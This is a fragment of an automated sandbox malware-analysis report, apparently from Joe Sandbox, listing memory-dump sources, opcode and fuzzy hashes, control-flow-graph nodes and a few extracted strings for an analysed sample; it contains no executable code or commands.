                                                                                                                                                                                                                                • Opcode ID: bd84b96c3c441b29f7cbca073fb28a8f4037a4ea5ff1c4b909fa8880ad79f65f
                                                                                                                                                                                                                                • Instruction ID: bc1795290d8c5c4028e43fece69044953a548c9ed3d3f44655ed7f073e837c32
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bd84b96c3c441b29f7cbca073fb28a8f4037a4ea5ff1c4b909fa8880ad79f65f
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 59B2237161CB454FD319EF38C4914A5BBE1FF95300B2485BEE48AC72E6DE36A846C782

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.1525129112.00007FFB4AF20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF20000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ffb4af20000_file.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: ]J$fish
                                                                                                                                                                                                                                • API String ID: 0-2394467443
                                                                                                                                                                                                                                • Opcode ID: 0bc4dd1c97afcb61706cc467796671e88df7c4b7a971cffa51f69ce1ebea0234
                                                                                                                                                                                                                                • Instruction ID: c21343f8952f04884168a358b3a94b19a2e6ee16d649cd3b24980e4cd85bc272
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0bc4dd1c97afcb61706cc467796671e88df7c4b7a971cffa51f69ce1ebea0234
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BDC15A72A1CA4A0FE74DBE38D8651B577E1FF96311B1441BED48BC71D2DE29A8028782
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.1525512972.00007FFB4AFF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AFF0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ffb4aff0000_file.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 182d97dca11bbc31536e9f6002cb919c0effefc9b2a0f0aac18f01753664dad9
                                                                                                                                                                                                                                • Instruction ID: c51c649dfab5687fa16ff0abfc7141443236f26ad7bf5ab5f6a612dd288abd5a
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 182d97dca11bbc31536e9f6002cb919c0effefc9b2a0f0aac18f01753664dad9
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E3E205B280D7864FE756EF38C8555A47BE0EF56300F1901FBE989CB1D3EA286846C791

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 879 7ffb4af2b24a-7ffb4af2b275 call 7ffb4af28cc0 884 7ffb4af2b2f6-7ffb4af2b2fe 879->884 885 7ffb4af2b277-7ffb4af2b2d8 call 7ffb4af277c0 879->885 889 7ffb4af2b2ff-7ffb4af2b35c 885->889 890 7ffb4af2b2da-7ffb4af2b2f3 885->890 893 7ffb4af2b35e-7ffb4af2b389 889->893 894 7ffb4af2b3a6-7ffb4af2b3cf call 7ffb4af2af60 call 7ffb4af27420 889->894 890->884 895 7ffb4af2b4cc-7ffb4af2b4d9 893->895 896 7ffb4af2b38f-7ffb4af2b3a2 893->896 894->895 904 7ffb4af2b3d5-7ffb4af2b3ff call 7ffb4af27b80 894->904 902 7ffb4af2b4db 895->902 903 7ffb4af2b4e1 895->903 896->894 902->903 905 7ffb4af2b4e5-7ffb4af2b4fa 903->905 906 7ffb4af2b4e3 903->906 916 7ffb4af2b40d-7ffb4af2b42a 904->916 917 7ffb4af2b401-7ffb4af2b40b 904->917 913 7ffb4af2b4fc-7ffb4af2b523 905->913 914 7ffb4af2b544-7ffb4af2b559 call 7ffb4af27420 905->914 906->905 908 7ffb4af2b525 906->908 910 7ffb4af2b52b-7ffb4af2b542 908->910 911 7ffb4af2b623-7ffb4af2b633 908->911 910->914 924 7ffb4af2b635-7ffb4af2b65c 911->924 913->908 914->911 923 7ffb4af2b55f-7ffb4af2b5c5 call 7ffb4af27b80 * 4 914->923 922 7ffb4af2b42e-7ffb4af2b433 916->922 917->916 920 7ffb4af2b42c 917->920 920->922 925 7ffb4af2b435-7ffb4af2b43c 922->925 926 7ffb4af2b49a-7ffb4af2b4a2 922->926 968 7ffb4af2b5cb-7ffb4af2b5cc 923->968 969 7ffb4af2b5c7-7ffb4af2b5c9 923->969 938 7ffb4af2b65e-7ffb4af2b661 924->938 939 7ffb4af2b6a6-7ffb4af2b6e3 call 7ffb4af2af60 * 2 call 7ffb4af27420 924->939 929 7ffb4af2b43e-7ffb4af2b441 925->929 930 7ffb4af2b495-7ffb4af2b498 925->930 926->895 931 7ffb4af2b4a4-7ffb4af2b4b6 926->931 935 7ffb4af2b4c2-7ffb4af2b4cb 929->935 936 7ffb4af2b443-7ffb4af2b446 929->936 934 7ffb4af2b4bc-7ffb4af2b4c1 930->934 931->934 934->935 940 7ffb4af2b450-7ffb4af2b453 936->940 941 7ffb4af2b448-7ffb4af2b44e 936->941 944 7ffb4af2b662 938->944 961 7ffb4af2b8b3-7ffb4af2b915 call 7ffb4af2b330 939->961 971 7ffb4af2b6e9-7ffb4af2b704 939->971 945 7ffb4af2b46c-7ffb4af2b47e 940->945 946 7ffb4af2b455-7ffb4af2b46a 940->946 941->940 949 7ffb4af2b664-7ffb4af2b665 944->949 950 7ffb4af2b688-7ffb4af2b689 944->950 945->895 953 7ffb4af2b480-7ffb4af2b498 945->953 946->945 955 7ffb4af2b66a-7ffb4af2b67c 949->955 960 7ffb4af2b68f-7ffb4af2b6a2 950->960 950->961 953->934 956 7ffb4af2b681-7ffb4af2b687 955->956 956->950 966 7ffb4af2b6a4-7ffb4af2b6a5 960->966 966->939 972 7ffb4af2b5d5-7ffb4af2b5dc 968->972 969->972 975 7ffb4af2b75d-7ffb4af2b766 971->975 976 7ffb4af2b706-7ffb4af2b709 971->976 972->924 973 7ffb4af2b5de-7ffb4af2b5e1 972->973 973->944 977 7ffb4af2b5e3-7ffb4af2b5f9 973->977 978 7ffb4af2b7d9-7ffb4af2b7e1 975->978 980 7ffb4af2b70b-7ffb4af2b71c 976->980 981 7ffb4af2b78a-7ffb4af2b7c2 976->981 977->955 983 7ffb4af2b5fb-7ffb4af2b600 977->983 986 7ffb4af2b852-7ffb4af2b867 978->986 987 7ffb4af2b7e3-7ffb4af2b7e8 978->987 980->966 988 7ffb4af2b71e-7ffb4af2b72b 980->988 981->978 983->956 989 7ffb4af2b602-7ffb4af2b622 call 7ffb4af277c0 983->989 990 7ffb4af2b869-7ffb4af2b872 call 7ffb4af24280 986->990 987->990 993 7ffb4af2b7ea-7ffb4af2b82e call 7ffb4af277c0 987->993 995 7ffb4af2b72d-7ffb4af2b75b 988->995 996 7ffb4af2b768-7ffb4af2b787 988->996 1003 7ffb4af2b877-7ffb4af2b887 990->1003 993->961 1005 7ffb4af2b834-7ffb4af2b851 993->1005 995->975 1008 7ffb4af2b7c4-7ffb4af2b7d5 996->1008 1009 7ffb4af2b789 996->1009 1003->961 1007 7ffb4af2b889-7ffb4af2b8b2 1003->1007 1005->986 1008->978 1009->981
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.1525129112.00007FFB4AF20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF20000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ffb4af20000_file.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: k&
                                                                                                                                                                                                                                • API String ID: 0-2956305165
                                                                                                                                                                                                                                • Opcode ID: 47ed42cb98bbea1655ba47396e8b047b223b56d2ea7d2a94e8580a4276107524
                                                                                                                                                                                                                                • Instruction ID: afb5cc6802977678935277f8a15c2f7391bc7d2f80bcf71729443f2d7995ab45
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 47ed42cb98bbea1655ba47396e8b047b223b56d2ea7d2a94e8580a4276107524
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 55326BB251DB464FE359EF34C4A50B577D1EF95300B2445FED88AC72E2DE2AA842C782

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 1010 7ffb4af233d0-7ffb4af24ae1 call 7ffb4af249a0 1017 7ffb4af24b04-7ffb4af24b13 1010->1017 1018 7ffb4af24ae3-7ffb4af24af9 call 7ffb4af249a0 call 7ffb4af249f0 1017->1018 1019 7ffb4af24b15-7ffb4af24b2f call 7ffb4af249a0 call 7ffb4af249f0 1017->1019 1028 7ffb4af24afb-7ffb4af24b02 1018->1028 1029 7ffb4af24b30-7ffb4af24b80 1018->1029 1028->1017 1034 7ffb4af24b8c-7ffb4af24bc3 1029->1034 1035 7ffb4af24b82-7ffb4af24b87 call 7ffb4af235c0 1029->1035 1038 7ffb4af24dbf-7ffb4af24e29 1034->1038 1039 7ffb4af24bc9-7ffb4af24bd4 1034->1039 1035->1034 1071 7ffb4af24e2b-7ffb4af24e31 1038->1071 1072 7ffb4af24e46-7ffb4af24e53 1038->1072 1040 7ffb4af24bd6-7ffb4af24be4 1039->1040 1041 7ffb4af24c48-7ffb4af24c4d 1039->1041 1040->1038 1043 7ffb4af24bea-7ffb4af24bf9 1040->1043 1044 7ffb4af24cc0-7ffb4af24cca 1041->1044 1045 7ffb4af24c4f-7ffb4af24c5b 1041->1045 1047 7ffb4af24bfb-7ffb4af24c2b 1043->1047 1048 7ffb4af24c2d-7ffb4af24c38 1043->1048 1049 7ffb4af24cec-7ffb4af24cf4 1044->1049 1050 7ffb4af24ccc-7ffb4af24cd9 call 7ffb4af235e0 1044->1050 1045->1038 1051 7ffb4af24c61-7ffb4af24c74 1045->1051 1047->1048 1056 7ffb4af24c79-7ffb4af24c7c 1047->1056 1048->1038 1053 7ffb4af24c3e-7ffb4af24c46 1048->1053 1054 7ffb4af24cf7-7ffb4af24d02 1049->1054 1066 7ffb4af24cde-7ffb4af24cea 1050->1066 1051->1054 1053->1040 1053->1041 1054->1038 1058 7ffb4af24d08-7ffb4af24d18 1054->1058 1061 7ffb4af24c7e-7ffb4af24c8e 1056->1061 1062 7ffb4af24c92-7ffb4af24c9a 1056->1062 1058->1038 1063 7ffb4af24d1e-7ffb4af24d2b 1058->1063 1061->1062 1062->1038 1065 7ffb4af24ca0-7ffb4af24cbf 1062->1065 1063->1038 1064 7ffb4af24d31-7ffb4af24d4e 1063->1064 1073 7ffb4af24d4f 1064->1073 1066->1049 1074 7ffb4af24e71-7ffb4af24e88 1071->1074 1075 7ffb4af24e33-7ffb4af24e44 1071->1075 1077 7ffb4af24e54-7ffb4af24e70 1072->1077 1078 7ffb4af24d51 1073->1078 1079 7ffb4af24d59-7ffb4af24d62 1073->1079 1074->1077 1086 7ffb4af24e8a-7ffb4af24ec5 1074->1086 1075->1071 1075->1072 1078->1038 1080 7ffb4af24d53-7ffb4af24d57 1078->1080 1082 7ffb4af24dad-7ffb4af24dbe 1079->1082 1083 7ffb4af24d64-7ffb4af24d6f 1079->1083 1080->1079 1083->1082 1089 7ffb4af24d71-7ffb4af24d88 1083->1089 1091 7ffb4af24ec7-7ffb4af24ed7 1086->1091 1092 7ffb4af24ed9-7ffb4af24f11 1086->1092 1089->1073 1096 7ffb4af24d8a-7ffb4af24da8 call 7ffb4af235e0 1089->1096 1091->1091 1091->1092 1099 7ffb4af24f13-7ffb4af24f19 1092->1099 1100 7ffb4af24f68-7ffb4af24f6f 1092->1100 1096->1082 1099->1100 1101 7ffb4af24f1b-7ffb4af24f1c 1099->1101 1103 7ffb4af24fb2-7ffb4af24fdb 1100->1103 1104 7ffb4af24f71-7ffb4af24f72 1100->1104 1105 7ffb4af24f1f-7ffb4af24f22 1101->1105 1106 7ffb4af24f75-7ffb4af24f78 1104->1106 1107 7ffb4af24fdc-7ffb4af24ff1 1105->1107 1108 7ffb4af24f28-7ffb4af24f35 1105->1108 1106->1107 1109 7ffb4af24f7a-7ffb4af24f8b 1106->1109 1119 7ffb4af24ffb-7ffb4af25081 1107->1119 1120 7ffb4af24ff3-7ffb4af24ffa 1107->1120 1111 7ffb4af24f61-7ffb4af24f66 1108->1111 1112 7ffb4af24f37-7ffb4af24f5e 1108->1112 1113 7ffb4af24f8d-7ffb4af24f93 1109->1113 1114 7ffb4af24fa9-7ffb4af24fb0 1109->1114 1111->1100 1111->1105 1112->1111 1113->1107 1118 7ffb4af24f95-7ffb4af24fa5 1113->1118 1114->1103 1114->1106 1118->1114 1120->1119
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.1525129112.00007FFB4AF20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF20000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ffb4af20000_file.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: d
                                                                                                                                                                                                                                • API String ID: 0-2564639436
                                                                                                                                                                                                                                • Opcode ID: 8b1181baba0de2f9cd3259d2a7413dfa643ec83e9464176bb40a0cce761b7a06
                                                                                                                                                                                                                                • Instruction ID: f7d426cf30338e86f14e0942ffe5b54487483a9013bb0fb6e46ceaf9cb496fa0
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8b1181baba0de2f9cd3259d2a7413dfa643ec83e9464176bb40a0cce761b7a06
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FF2244B291CA4A4FE349EF38C4915B177D4EF85311B2442FAC49AC71D7DE2AE8438782

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 1771 7ffb4af29700-7ffb4af29750 1776 7ffb4af2975c-7ffb4af29798 1771->1776 1777 7ffb4af29752-7ffb4af29757 call 7ffb4af228d0 1771->1777 1780 7ffb4af2979e-7ffb4af297a7 1776->1780 1781 7ffb4af29994-7ffb4af299a9 1776->1781 1777->1776 1782 7ffb4af2981b-7ffb4af29820 1780->1782 1783 7ffb4af297a9-7ffb4af297b0 1780->1783 1788 7ffb4af299ab 1781->1788 1789 7ffb4af299b3-7ffb4af299fe 1781->1789 1786 7ffb4af29892-7ffb4af2989c 1782->1786 1787 7ffb4af29822-7ffb4af2982e 1782->1787 1783->1781 1785 7ffb4af297b6-7ffb4af297cf 1783->1785 1790 7ffb4af297d1-7ffb4af297f7 1785->1790 1791 7ffb4af297f9-7ffb4af29807 1785->1791 1792 7ffb4af298be-7ffb4af298c6 1786->1792 1793 7ffb4af2989e 1786->1793 1787->1781 1794 7ffb4af29834-7ffb4af29847 1787->1794 1796 7ffb4af299ad-7ffb4af299b2 1788->1796 1809 7ffb4af29a1b-7ffb4af29a2c 1789->1809 1810 7ffb4af29a00-7ffb4af29a06 1789->1810 1790->1791 1801 7ffb4af2984c-7ffb4af2984f 1790->1801 1791->1781 1799 7ffb4af2980d-7ffb4af29819 1791->1799 1795 7ffb4af298c9-7ffb4af298d4 1792->1795 1803 7ffb4af298a3-7ffb4af298ab call 7ffb4af228f0 1793->1803 1794->1795 1795->1781 1800 7ffb4af298da-7ffb4af298f5 1795->1800 1796->1789 1799->1782 1799->1783 1800->1781 1804 7ffb4af298fb-7ffb4af2990f 1800->1804 1805 7ffb4af2985b-7ffb4af29866 1801->1805 1806 7ffb4af29851 1801->1806 1811 7ffb4af298b0-7ffb4af298bc 1803->1811 1804->1781 1812 7ffb4af29915-7ffb4af29926 1804->1812 1805->1781 1813 7ffb4af2986c-7ffb4af29891 1805->1813 1806->1805 1816 7ffb4af29a3d-7ffb4af29a60 1809->1816 1817 7ffb4af29a2e-7ffb4af29a3c 1809->1817 1814 7ffb4af29a61-7ffb4af29ad8 1810->1814 1815 7ffb4af29a08-7ffb4af29a19 1810->1815 1811->1792 1812->1781 1821 7ffb4af29928-7ffb4af29937 1812->1821 1833 7ffb4af29b3a-7ffb4af29b7a 1814->1833 1834 7ffb4af29ada-7ffb4af29b37 1814->1834 1815->1809 1815->1810 1817->1816 1824 7ffb4af29982-7ffb4af29993 1821->1824 1825 7ffb4af29939-7ffb4af29944 1821->1825 1825->1824 1831 7ffb4af29946-7ffb4af2995e 1825->1831 1831->1796 1844 7ffb4af29960-7ffb4af2997d call 7ffb4af228f0 1831->1844 1842 7ffb4af29b8e-7ffb4af29b9f 1833->1842 1843 7ffb4af29b7c-7ffb4af29b8c 1833->1843 1834->1833 1845 7ffb4af29ba1-7ffb4af29baf 1842->1845 1846 7ffb4af29bb0-7ffb4af29be1 1842->1846 1843->1842 1843->1843 1844->1824 1845->1846 1852 7ffb4af29be3-7ffb4af29be9 1846->1852 1853 7ffb4af29c38-7ffb4af29c3f 1846->1853 1852->1853 1854 7ffb4af29beb-7ffb4af29bec 1852->1854 1855 7ffb4af29c41-7ffb4af29c42 1853->1855 1856 7ffb4af29c80-7ffb4af29ca9 1853->1856 1857 7ffb4af29bef-7ffb4af29bf2 1854->1857 1858 7ffb4af29c45-7ffb4af29c48 1855->1858 1860 7ffb4af29caa-7ffb4af29cbd 1857->1860 1861 7ffb4af29bf8-7ffb4af29c08 1857->1861 1858->1860 1862 7ffb4af29c4a-7ffb4af29c5b 1858->1862 1871 7ffb4af29cbf-7ffb4af29cc6 1860->1871 1872 7ffb4af29cc7-7ffb4af29e78 1860->1872 1863 7ffb4af29c31-7ffb4af29c36 1861->1863 1864 7ffb4af29c0a-7ffb4af29c2d 1861->1864 1865 7ffb4af29c5d-7ffb4af29c63 1862->1865 1866 7ffb4af29c77-7ffb4af29c7e 1862->1866 1863->1853 1863->1857 1864->1863 1865->1860 1868 7ffb4af29c65-7ffb4af29c73 1865->1868 1866->1856 1866->1858 1868->1866 1871->1872 1887 7ffb4af29edf-7ffb4af29fc7 1872->1887 1888 7ffb4af29e7a-7ffb4af29e83 1872->1888
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.1525129112.00007FFB4AF20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF20000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ffb4af20000_file.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 3cc1795c8e2f6a885416777fdfc8ea288c9ba3e37317af0e7c01d66f3b42bc54
                                                                                                                                                                                                                                • Instruction ID: 290c6eb0e9851bcba20f12d92a238949fa64f7d11a0c8e10a7218065f5dcfd79
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3cc1795c8e2f6a885416777fdfc8ea288c9ba3e37317af0e7c01d66f3b42bc54
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3B52C46291DBC64FE3569F78D8A10A07FE4EF53310B1945FAC0CACB5D3D91AA806C752
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.1525129112.00007FFB4AF20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF20000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ffb4af20000_file.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 24e5126643d938e9faa737367d70d3ddb14d3b0a41cfd1822b18c5d229b72dff
                                                                                                                                                                                                                                • Instruction ID: 84a1d3fcd4892504942798ef7a33f4907ae1da0eab3b9701b535887d5c6779a3
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 24e5126643d938e9faa737367d70d3ddb14d3b0a41cfd1822b18c5d229b72dff
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5432D571A1CA094FEB68EE38C46567977E5EF59301F2401BEE44EC72D2DE25EC428782
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.1525129112.00007FFB4AF20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF20000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ffb4af20000_file.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: d035b9242c758bd805ae18d1a685559c56a304ecc48e70f9a88b0604e29bc76f
                                                                                                                                                                                                                                • Instruction ID: 2ec1c68bf19a75cef9a202270f3473a5b729c7397a241bed88da970f33c1fd10
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d035b9242c758bd805ae18d1a685559c56a304ecc48e70f9a88b0604e29bc76f
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6E0208B1A1C94A4FE768FE2CC9165E477D5EF89310B2403FAD44DCB2D2DE29AC068391
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.1525129112.00007FFB4AF20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF20000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ffb4af20000_file.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 236e27f86a8ec3d4a280a12ef866252f11761218653a5021f63b244f8252b5b7
                                                                                                                                                                                                                                • Instruction ID: 442e00f3601437439804696472b17dfb47bf576428645838ca378b5fa8e73c42
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 236e27f86a8ec3d4a280a12ef866252f11761218653a5021f63b244f8252b5b7
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D6E1697291CB864FE319DF34C4A11B5B7D2EF95301B2446BED8DAC72E1DD29A842C782
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.1525129112.00007FFB4AF20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF20000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ffb4af20000_file.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: f9af01283eeeb3ec2f9cc71459e791141159c8c54039b2a6cf71bed7d73df0df
                                                                                                                                                                                                                                • Instruction ID: 5b02f2fffda971dab26feb7d10b233f92661a28dc82f75551355349b85a770ba
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f9af01283eeeb3ec2f9cc71459e791141159c8c54039b2a6cf71bed7d73df0df
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FFC14E93A2CA494BF788BF78D5267B866E6EF99300F5401F9E80DD72D7DD296C018342
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.1525129112.00007FFB4AF20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF20000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ffb4af20000_file.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 028d3dede3e47f342c9c7f79680216e405fb9676fef35773f6fa5d70a973bf1c
                                                                                                                                                                                                                                • Instruction ID: 116b16573db3a07f02a6cba9f5bd118159bbe77afd148c063bc3695f7d36af01
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 028d3dede3e47f342c9c7f79680216e405fb9676fef35773f6fa5d70a973bf1c
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 08415A7160D78A0FD71EAE78D8251B57B95DB83220B1582BFD487CB1E7DC186C478391
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.1525129112.00007FFB4AF20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF20000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ffb4af20000_file.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: d937e7732468dde3e0b52496c450a0761d3e4d69cb2fc32855dd249fca680993
                                                                                                                                                                                                                                • Instruction ID: a63b4acb06a26730c3ee376e8cb10cdf2dd45c729b993ae4b65ef7efff8c9402
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d937e7732468dde3e0b52496c450a0761d3e4d69cb2fc32855dd249fca680993
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DD414A7160D78A5FD71EAE74C8251A57BA5DB83310B25C2BED487CB1E7DC289C0A8391

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 1556 7ffb4af231b9-7ffb4af231c3 1557 7ffb4af23205-7ffb4af2326f VirtualProtect 1556->1557 1558 7ffb4af231c5-7ffb4af23202 1556->1558 1561 7ffb4af23271 1557->1561 1562 7ffb4af23277-7ffb4af2329f 1557->1562 1558->1557 1561->1562
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.1525129112.00007FFB4AF20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF20000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ffb4af20000_file.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ProtectVirtual
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 544645111-0
                                                                                                                                                                                                                                • Opcode ID: 404db6ac8fbf059c9de253de4da46e62a0a31064975c5f5f5858022cd155c447
                                                                                                                                                                                                                                • Instruction ID: 2ea479cf369399e183846850da87c8ce54166a8fc5b37a43d61e4fdca772bcd9
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 404db6ac8fbf059c9de253de4da46e62a0a31064975c5f5f5858022cd155c447
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5031267190CA4C8FDB18DFACE8456F97BE1EBA6311F14426FD049C3192CB616846CB92
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.1525512972.00007FFB4AFF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AFF0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ffb4aff0000_file.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 278f6ddd4269b574a68b9b8666bba798a832a5142aa8584bf55254e8215895d4
                                                                                                                                                                                                                                • Instruction ID: 58fa2bbd487c63ed7e94988e2b2ac1926e25e7d4d97ab97740bd7eda39f2c0c9
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 278f6ddd4269b574a68b9b8666bba798a832a5142aa8584bf55254e8215895d4
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9B71F37190DA894FEB56EF78C8556A43BE4EF56300B1901FBE44ACB1D3DA28AC06C391
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.1525512972.00007FFB4AFF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AFF0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ffb4aff0000_file.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 80a9c34be6bd484eb8f9d6cccda0cea37a0728b426d6fbaeaf018a06f83407a9
                                                                                                                                                                                                                                • Instruction ID: 6ce12dc58393e3e4fdac6ce01627a61e5675dffc6383549e6aa9866344e17634
